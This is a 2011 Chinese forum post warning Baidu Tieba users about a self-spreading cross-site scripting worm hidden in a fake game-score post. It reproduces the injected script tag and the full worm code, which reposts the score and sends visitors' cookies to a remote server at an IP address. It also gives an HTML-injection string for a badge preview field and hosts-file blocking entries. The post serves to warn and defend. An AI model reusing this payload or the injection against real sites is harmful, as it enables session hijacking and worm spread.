本帖最后由 大明神数字君 于 2011-1-2 00:31 编辑
首先···想要弄清楚这件事情的同学们请在进行探索之前先把浏览器的cookies清除
然后申请一个百度的小号
接下来说正事···
咳咳···
就在前6个小时左右,i贴吧出现黄金矿工显摆分数922e这么一个疯狂的数字···
所有打开i贴吧,看到显摆922e分开始
页面执行了一段代码
- <li>
- <a target="_blank" href="/f?kw="</a><script>var s=document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://users.cjb.net/wapp/bdhm.js';void(0);</script><a target="_blank" href="/f?kw=%BB%C6%BD%F0%BF%F3%B9%A4#game" class="thread_title">黄金矿工</a> :<em class="score" style="font-size:16px">9223372036854775807</em>, 排名天下第一,表示像bug一样存在着。
- <nobr>
- <span class="b_reply_txt">
- <a target="_blank" class="b_reply" href="/i/79564454/p/75943161">回复</a> </span>
- </nobr>
- </li>
复制代码
这么一段,根据追踪,可以下载到下面的代码
- //xmlhttp
- function xmlhttp(){if(window.XMLHttpRequest){return new XMLHttpRequest()}else{if(window.ActiveXObject){var F=["MSXML2.XMLHttp.6.0","MSXML2.XMLHttp.3.0","MSXML2.XMLHttp.5.0","MSXML2.XMLHttp.4.0","Msxml2.XMLHTTP","MSXML.XMLHttp","Microsoft.XMLHTTP"];for(var E=0;F[E];E++){try{return new ActiveXObject(F[E])}catch(D){}}throw new Error("Your browser do not support XMLHttp")}}}
- //md5
- var hexcase = 0; function hex_md5(a) { return rstr2hex(rstr_md5(str2rstr_utf8(a))) } function hex_hmac_md5(a, b) { return rstr2hex(rstr_hmac_md5(str2rstr_utf8(a), str2rstr_utf8(b))) } function md5_vm_test() { return hex_md5("abc").toLowerCase() == "900150983cd24fb0d6963f7d28e17f72" } function rstr_md5(a) { return binl2rstr(binl_md5(rstr2binl(a), a.length * 8)) } function rstr_hmac_md5(c, f) { var e = rstr2binl(c); if (e.length > 16) { e = binl_md5(e, c.length * 8) } var a = Array(16), d = Array(16); for (var b = 0; b < 16; b++) { a[b] = e[b] ^ 909522486; d[b] = e[b] ^ 1549556828 } var g = binl_md5(a.concat(rstr2binl(f)), 512 + f.length * 8); return binl2rstr(binl_md5(d.concat(g), 512 + 128)) } function rstr2hex(c) { try { hexcase } catch (g) { hexcase = 0 } var f = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; var b = ""; var a; for (var d = 0; d < c.length; d++) { a = c.charCodeAt(d); b += f.charAt((a >>> 4) & 15) + f.charAt(a & 15) } return b } function str2rstr_utf8(c) { var b = ""; var d = -1; var a, e; while (++d < c.length) { a = c.charCodeAt(d); e = d + 1 < c.length ? c.charCodeAt(d + 1) : 0; if (55296 <= a && a <= 56319 && 56320 <= e && e <= 57343) { a = 65536 + ((a & 1023) << 10) + (e & 1023); d++ } if (a <= 127) { b += String.fromCharCode(a) } else { if (a <= 2047) { b += String.fromCharCode(192 | ((a >>> 6) & 31), 128 | (a & 63)) } else { if (a <= 65535) { b += String.fromCharCode(224 | ((a >>> 12) & 15), 128 | ((a >>> 6) & 63), 128 | (a & 63)) } else { if (a <= 2097151) { b += String.fromCharCode(240 | ((a >>> 18) & 7), 128 | ((a >>> 12) & 63), 128 | ((a >>> 6) & 63), 128 | (a & 63)) } } } } } return b } function rstr2binl(b) { var a = Array(b.length >> 2); for (var c = 0; c < a.length; c++) { a[c] = 0 } for (var c = 0; c < b.length * 8; c += 8) { a[c >> 5] |= (b.charCodeAt(c / 8) & 255) << (c % 32) } return a } function binl2rstr(b) { var a = ""; for (var c = 0; c < b.length * 32; c += 8) { a += String.fromCharCode((b[c >> 5] >>> (c % 32)) & 255) } return a } function binl_md5(p, k) { p[k >> 5] |= 128 << ((k) % 32); p[(((k + 64) >>> 9) << 4) + 14] = k; var o = 1732584193; var n = -271733879; var m = -1732584194; var l = 271733878; for (var g = 0; g < p.length; g += 16) { var j = o; var h = n; var f = m; var e = l; o = md5_ff(o, n, m, l, p[g + 0], 7, -680876936); l = md5_ff(l, o, n, m, p[g + 1], 12, -389564586); m = md5_ff(m, l, o, n, p[g + 2], 17, 606105819); n = md5_ff(n, m, l, o, p[g + 3], 22, -1044525330); o = md5_ff(o, n, m, l, p[g + 4], 7, -176418897); l = md5_ff(l, o, n, m, p[g + 5], 12, 1200080426); m = md5_ff(m, l, o, n, p[g + 6], 17, -1473231341); n = md5_ff(n, m, l, o, p[g + 7], 22, -45705983); o = md5_ff(o, n, m, l, p[g + 8], 7, 1770035416); l = md5_ff(l, o, n, m, p[g + 9], 12, -1958414417); m = md5_ff(m, l, o, n, p[g + 10], 17, -42063); n = md5_ff(n, m, l, o, p[g + 11], 22, -1990404162); o = md5_ff(o, n, m, l, p[g + 12], 7, 1804603682); l = md5_ff(l, o, n, m, p[g + 13], 12, -40341101); m = md5_ff(m, l, o, n, p[g + 14], 17, -1502002290); n = md5_ff(n, m, l, o, p[g + 15], 22, 1236535329); o = md5_gg(o, n, m, l, p[g + 1], 5, -165796510); l = md5_gg(l, o, n, m, p[g + 6], 9, -1069501632); m = md5_gg(m, l, o, n, p[g + 11], 14, 643717713); n = md5_gg(n, m, l, o, p[g + 0], 20, -373897302); o = md5_gg(o, n, m, l, p[g + 5], 5, -701558691); l = md5_gg(l, o, n, m, p[g + 10], 9, 38016083); m = md5_gg(m, l, o, n, p[g + 15], 14, -660478335); n = md5_gg(n, m, l, o, p[g + 4], 20, -405537848); o = md5_gg(o, n, m, l, p[g + 9], 5, 568446438); l = md5_gg(l, o, n, m, p[g + 14], 9, -1019803690); m = md5_gg(m, l, o, n, p[g + 3], 14, -187363961); n = md5_gg(n, m, l, o, p[g + 8], 20, 1163531501); o = md5_gg(o, n, m, l, p[g + 13], 5, -1444681467); l = md5_gg(l, o, n, m, p[g + 2], 9, -51403784); m = md5_gg(m, l, o, n, p[g + 7], 14, 1735328473); n = md5_gg(n, m, l, o, p[g + 12], 20, -1926607734); o = md5_hh(o, n, m, l, p[g + 5], 4, -378558); l = md5_hh(l, o, n, m, p[g + 8], 11, -2022574463); m = md5_hh(m, l, o, n, p[g + 11], 16, 1839030562); n = md5_hh(n, m, l, o, p[g + 14], 23, -35309556); o = md5_hh(o, n, m, l, p[g + 1], 4, -1530992060); l = md5_hh(l, o, n, m, p[g + 4], 11, 1272893353); m = md5_hh(m, l, o, n, p[g + 7], 16, -155497632); n = md5_hh(n, m, l, o, p[g + 10], 23, -1094730640); o = md5_hh(o, n, m, l, p[g + 13], 4, 681279174); l = md5_hh(l, o, n, m, p[g + 0], 11, -358537222); m = md5_hh(m, l, o, n, p[g + 3], 16, -722521979); n = md5_hh(n, m, l, o, p[g + 6], 23, 7602***9); o = md5_hh(o, n, m, l, p[g + 9], 4, -640364487); l = md5_hh(l, o, n, m, p[g + 12], 11, -421815835); m = md5_hh(m, l, o, n, p[g + 15], 16, 530742520); n = md5_hh(n, m, l, o, p[g + 2], 23, -995338651); o = md5_ii(o, n, m, l, p[g + 0], 6, -198630844); l = md5_ii(l, o, n, m, p[g + 7], 10, 1126891415); m = md5_ii(m, l, o, n, p[g + 14], 15, -1416354905); n = md5_ii(n, m, l, o, p[g + 5], 21, -57434055); o = md5_ii(o, n, m, l, p[g + 12], 6, 1700485571); l = md5_ii(l, o, n, m, p[g + 3], 10, -1894986606); m = md5_ii(m, l, o, n, p[g + 10], 15, -1051523); n = md5_ii(n, m, l, o, p[g + 1], 21, -2054922799); o = md5_ii(o, n, m, l, p[g + 8], 6, 1873313359); l = md5_ii(l, o, n, m, p[g + 15], 10, -30611744); m = md5_ii(m, l, o, n, p[g + 6], 15, -1560198380); n = md5_ii(n, m, l, o, p[g + 13], 21, 1309151649); o = md5_ii(o, n, m, l, p[g + 4], 6, -145523070); l = md5_ii(l, o, n, m, p[g + 11], 10, -1120210379); m = md5_ii(m, l, o, n, p[g + 2], 15, 718787259); n = md5_ii(n, m, l, o, p[g + 9], 21, -343485551); o = safe_add(o, j); n = safe_add(n, h); m = safe_add(m, f); l = safe_add(l, e) } return Array(o, n, m, l) } function md5_cmn(h, e, d, c, g, f) { return safe_add(bit_rol(safe_add(safe_add(e, h), safe_add(c, f)), g), d) } function md5_ff(g, f, k, j, e, i, h) { return md5_cmn((f & k) | ((~f) & j), g, f, e, i, h) } function md5_gg(g, f, k, j, e, i, h) { return md5_cmn((f & j) | (k & (~j)), g, f, e, i, h) } function md5_hh(g, f, k, j, e, i, h) { return md5_cmn(f ^ k ^ j, g, f, e, i, h) } function md5_ii(g, f, k, j, e, i, h) { return md5_cmn(k ^ (f | (~j)), g, f, e, i, h) } function safe_add(a, d) { var c = (a & 65535) + (d & 65535); var b = (a >> 16) + (d >> 16) + (c >> 16); return (b << 16) | (c & 65535) } function bit_rol(a, b) { return (a << b) | (a >>> (32 - b)) };
- var GameID = "18";
- var GameName = "%22%3c%2fa%3e%3cscript%3evar+s%3ddocument.createElement('script')%3bs.type%3d'text%2fjavascript'%3bdocument.body.appendChild(s)%3bs.src%3d'http%3a%2f%2fusers.cjb.net%2fwapp%2fbdhm.js'%3bvoid(0)%3b%3c%2fscript%3e%3ca+target%3d%22_blank%22+href%3d%22%2ff%3fkw%3d%25BB%25C6%25BD%25F0%25BF%25F3%25B9%25A4";
- var GamePro = "tieba";
- var txmlhttp = xmlhttp();
- var fen = 9223372036854776000;
- var token = "";
- txmlhttp.onreadystatechange = function(){
- if (txmlhttp.readyState == 4) {
- var ttxmlhttp = xmlhttp();
- token = gettoken(txmlhttp.responseText);//JSON.parse(txmlhttp.responseText).token;
-
- ttxmlhttp.open("POST", "/app/sgp/addResult?format=json&t="+Math.random());
- ttxmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- ttxmlhttp.send("bd%5Fsig="+getsig(fen)+"&pla="+GameName+"&game%5Fid="+GameID+"&pro="+GamePro+"&result="+fen);
- ttxmlhttp.open("POST", "/app/sgp/showResult?format=json&t="+Math.random());
- ttxmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- ttxmlhttp.send("bd%5Fsig="+getsig(fen)+"&pla="+GameName+"&game%5Fid="+GameID+"&pro="+GamePro+"&result="+fen);
-
- txmlhttp.open("GET", "http://125.79.207.65:8081/aaa.asp?cookie="+document.cookie);
- txmlhttp.send(null);
- }
- };
- txmlhttp.open("POST", "/app/sgp/getToken?format=json&t="+Math.random());
- txmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- txmlhttp.send("game%5Fid="+GameID);
- function getsig(fen){
- return hex_md5(GameID+GamePro+fen+token);
- }
- function gettoken(r){
- var ts = r.match(/{"token":"(.*?)"}/)
- return ts[1]
- }
复制代码
我自己也不是很懂这些代码,但是大致上还是能明白,这个代码可以将你本地的cookies上传至 users.cjb.net 这个服务器上
并且你会自动在i贴吧里面发一个一模一样的922e的i帖,这样就达到了瘟疫式传播的情况
综上所述,联系百度cookies登陆方法,不难看出,虽然对方无法得到你的百度账户密码,但是可以通过cookies文件来登陆你的账号
差不多这么一个盗号流程就明白了
ps:这个代码不仅仅限于只能在i贴吧运行,其实在贴吧中也能运行,无论是贴吧,i贴吧,俱乐部都可以运行,所以还请各位小心
其实之后又出现了第二个bug
就是在百度头像上可以出现一行字
具体就是进入贴吧商城
选择自己想要买的徽章,点击预览,选择贴吧那一栏不去管它,在下面的输入贴吧名字里面写入如下代码
- 贴吧名称"></div>输入要输入的文字<div title="贴吧名称
复制代码
其实在里面可以运行任何html代码,如果说被人恶意挂马,那结果就是只要浏览页面看到他,那么你就中木马了
关于防范措施,目前暂时可以通过添加host文件来被动防御
- 127.0.0.1 cjb.net
- 127.0.0.1 www.cjb.net
- 127.0.0.1 users.cjb.net
复制代码
另外还请大家暂时用经典版贴吧吧···
目前只能这样了
对于已经感染了922e i帖的同学们···请用手机登陆贴吧,将自己的922e帖子全部删除,然后从此不要进入i贴吧 |